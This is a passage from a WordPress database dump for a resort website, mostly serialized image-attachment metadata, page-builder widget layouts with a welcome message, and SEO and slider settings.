ype\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3955-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3955-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3955-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3955-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3955-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3955-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1473690249\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.6\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:14:\"0.103092783505\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(775,107,'_yoast_wpseo_content_score','60'),(778,64,'_yoast_wpseo_content_score','90'),(885,84,'_yoast_wpseo_content_score','90'),(886,43,'_yoast_wpseo_content_score','60'),(887,172,'_edit_lock','1485105466:2'),(888,172,'_edit_last','2'),(889,172,'_yoast_wpseo_content_score','30'),(890,52,'_yoast_wpseo_content_score','90'),(891,444,'panels_data','a:3:{s:7:\"widgets\";a:4:{i:0;a:13:{s:5:\"image\";i:209;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:7:\"default\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cec8be267\";s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;s:11:\"panels_info\";a:7:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"46f19208-52bd-4586-aa0d-94e9ea4cae99\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:1;a:13:{s:5:\"image\";i:210;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:6:\"center\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cf1ab2bd4\";s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;s:11:\"panels_info\";a:7:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:1;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"ca65f0df-7424-4df0-be25-3ade6905157c\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:2;a:13:{s:5:\"image\";i:211;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:5:\"right\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cedcecddc\";s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;s:11:\"panels_info\";a:7:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:2;s:2:\"id\";i:2;s:9:\"widget_id\";s:36:\"6dc5bf6b-eef8-44d7-a273-45eb7ad8a950\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:3;a:6:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:164:\"<h3 style=\"text-align: center;\">We look forward to making this your favorite vacation spot. </h3><h5 style=\"text-align: center;\"><em>Mike and Diane Bovee</em></h5>\";s:20:\"text_selected_editor\";s:7:\"tinymce\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cbda086a7\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:1;s:4:\"cell\";i:0;s:2:\"id\";i:3;s:9:\"widget_id\";s:36:\"73c41aa6-fedd-4864-8392-482a5aeb5d92\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}}s:5:\"grids\";a:2:{i:0;a:2:{s:5:\"cells\";i:3;s:5:\"style\";a:0:{}}i:1;a:2:{s:5:\"cells\";i:1;s:5:\"style\";a:0:{}}}s:10:\"grid_cells\";a:4:{i:0;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";d:0.333333333333333314829616256247390992939472198486328125;}i:1;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";d:0.333333333333333314829616256247390992939472198486328125;}i:2;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";d:0.333333333333333314829616256247390992939472198486328125;}i:3;a:2:{s:4:\"grid\";i:1;s:6:\"weight\";i:1;}}}'),(892,2,'_yoast_wpseo_content_score','90'),(893,445,'panels_data','a:3:{s:7:\"widgets\";a:4:{i:0;a:13:{s:5:\"image\";i:353;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:7:\"default\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cec8be267\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"46f19208-52bd-4586-aa0d-94e9ea4cae99\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;}i:1;a:13:{s:5:\"image\";i:210;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:6:\"center\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cf1ab2bd4\";s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;s:11:\"panels_info\";a:7:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:1;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"ca65f0df-7424-4df0-be25-3ade6905157c\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:2;a:13:{s:5:\"image\";i:211;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:5:\"right\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cedcecddc\";s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;s:11:\"panels_info\";a:7:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:2;s:2:\"id\";i:2;s:9:\"widget_id\";s:36:\"6dc5bf6b-eef8-44d7-a273-45eb7ad8a950\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:3;a:6:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:164:\"<h3 style=\"text-align: center;\">We look forward to making this your favorite vacation spot. </h3><h5 style=\"text-align: center;\"><em>Mike and Diane Bovee</em></h5>\";s:20:\"text_selected_editor\";s:7:\"tinymce\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cbda086a7\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:1;s:4:\"cell\";i:0;s:2:\"id\";i:3;s:9:\"widget_id\";s:36:\"73c41aa6-fedd-4864-8392-482a5aeb5d92\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}}s:5:\"grids\";a:2:{i:0;a:2:{s:5:\"cells\";i:3;s:5:\"style\";a:0:{}}i:1;a:2:{s:5:\"cells\";i:1;s:5:\"style\";a:0:{}}}s:10:\"grid_cells\";a:4:{i:0;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";d:0.333333333333333314829616256247390992939472198486328125;}i:1;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";d:0.333333333333333314829616256247390992939472198486328125;}i:2;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";d:0.333333333333333314829616256247390992939472198486328125;}i:3;a:2:{s:4:\"grid\";i:1;s:6:\"weight\";i:1;}}}'),(894,353,'ml-slider_type','image'),(895,353,'_wp_attachment_backup_sizes','a:1:{s:15:\"resized-700x300\";a:5:{s:4:\"path\";s:93:\"/home/expcom5/public_html/ashbyresort.com/dir/wp-content/uploads/2017/01/DSCN3472-700x300.jpg\";s:4:\"file\";s:20:\"DSCN3472-700x300.jpg\";s:5:\"width\";i:700;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}'),(896,227,'ml-slider_type','image'),(897,227,'_wp_attachment_backup_sizes','a:1:{s:15:\"resized-700x300\";a:5:{s:4:\"path\";s:93:\"/home/expcom5/public_html/ashbyresort.com/dir/wp-content/uploads/2016/03/DSCN3361-700x300.jpg\";s:4:\"file\";s:20:\"DSCN3361-700x300.jpg\";s:5:\"width\";i:700;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}'),(898,353,'ml-slider_crop_position','left-bottom'),(899,353,'_wp_attachment_image_alt',''),(900,227,'ml-slider_crop_position','center-center'),(901,227,'_wp_attachment_image_alt',''),(907,446,'panels_data','a:3:{s:7:\"widgets\";a:3:{i:0;a:13:{s:5:\"image\";i:210;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:6:\"center\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cf1ab2bd4\";s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;s:11:\"panels_info\";a:7:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:1;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"ca65f0df-7424-4df0-be25-3ade6905157c\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:1;a:13:{s:5:\"image\";i:211;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:5:\"right\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cedcecddc\";s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;s:11:\"panels_info\";a:7:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:2;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"6dc5bf6b-eef8-44d7-a273-45eb7ad8a950\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:2;a:6:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:164:\"<h3 style=\"text-align: center;\">We look forward to making this your favorite vacation spot. </h3><h5 style=\"text-align: center;\"><em>Mike and Diane Bovee</em></h5>\";s:20:\"text_selected_editor\";s:7:\"tinymce\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cbda086a7\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:1;s:4:\"cell\";i:0;s:2:\"id\";i:2;s:9:\"widget_id\";s:36:\"73c41aa6-fedd-4864-8392-482a5aeb5d92\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}}s:5:\"grids\";a:2:{i:0;a:2:{s:5:\"cells\";i:3;s:5:\"style\";a:0:{}}i:1;a:2:{s:5:\"cells\";i:1;s:5:\"style\";a:0:{}}}s:10:\"grid_cells\";a:4:{i:0;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";d:0.333333333333333314829616256247390992939472198486328125;}i:1;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";d:0.333333333333333314829616256247390992939472198486328125;}i:2;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";d:0.333333333333333314829616256247390992939472198486328125;}i:3;a:2:{s:4:\"grid\";i:1;s:6:\"weight\";i:1;}}}'),(908,447,'_wp_attached_file','2017/01/DSCN3227.jpg'),(909,447,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2017/01/DSCN3227.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3227-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3227-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3227-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3227-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3227-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3227-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3227-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3227-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3227-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3227-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3227-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3227-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1448772733\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"144\";s:3:\"iso\";s:3:\"185\";s:13:\"shutter_speed\";s:15:\"0.0166666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(910,448,'_wp_attached_file','2017/01/DSCN3893.jpg'),(911,448,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3648;s:6:\"height\";i:2736;s:4:\"file\";s:20:\"2017/01/DSCN3893.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3893-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3893-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3893-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3893-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3893-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3893-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3893-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3893-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3893-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3893-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3893-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3893-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1472924718\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"23\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:16:\"0.00393855848759\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(912,449,'_wp_attached_file','2017/01/DSCN4031.jpg'),(913,449,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3648;s:6:\"height\";i:2736;s:4:\"file\";s:20:\"2017/01/DSCN4031.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN4031-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN4031-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN4031-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN4031-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN4031-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN4031-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN4031-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN4031-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN4031-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN4031-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN4031-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN4031-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1479462797\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"10.3\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:15:\"0.0114416475973\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(914,450,'_wp_attached_file','2017/01/DSCN4048.jpg'),(915,450,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3648;s:6:\"height\";i:2736;s:4:\"file\";s:20:\"2017/01/DSCN4048.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN4048-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN4048-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN4048-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN4048-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN4048-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN4048-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN4048-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN4048-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN4048-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN4048-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN4048-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN4048-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1479463130\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.6\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:16:\"0.00936329588015\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(916,449,'ml-slider_type','image'),(917,449,'_wp_attachment_backup_sizes','a:1:{s:15:\"resized-700x300\";a:5:{s:4:\"path\";s:93:\"/home/expcom5/public_html/ashbyresort.com/dir/wp-content/uploads/2017/01/DSCN4031-700x300.jpg\";s:4:\"file\";s:20:\"DSCN4031-700x300.jpg\";s:5:\"width\";i:700;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}'),(918,448,'ml-slider_type','image'),(919,448,'_wp_attachment_backup_sizes','a:1:{s:15:\"resized-700x300\";a:5:{s:4:\"path\";s:93:\"/home/expcom5/public_html/ashbyresort.com/dir/wp-content/uploads/2017/01/DSCN3893-700x300.jpg\";s:4:\"file\";s:20:\"DSCN3893-700x300.jpg\";s:5:\"width\";i:700;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}'),(920,449,'ml-slider_crop_position','center-center'),(921,449,'_wp_attachment_image_alt',''),(922,448,'ml-slider_crop_position','center-center'),(923,448,'_wp_attachment_image_alt',''),(924,308,'ml-slider_type','image'),(925,308,'_wp_attachment_backup_sizes','a:1:{s:15:\"resized-640x274\";a:5:{s:4:\"path\";s:95:\"/home/expcom5/public_html/ashbyresort.com/dir/wp-content/uploads/2017/01/ResortPics-640x274.jpg\";s:4:\"file\";s:22:\"ResortPics-640x274.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:274;s:9:\"mime-type\";s:10:\"image/jpeg\";}}'),(926,308,'ml-slider_crop_position','center-center'),(927,308,'_wp_attachment_image_alt',''),(928,451,'_wp_attached_file','2017/01/DSCN4045.jpg'),(929,451,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3648;s:6:\"height\";i:2736;s:4:\"file\";s:20:\"2017/01/DSCN4045.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN4045-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN4045-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9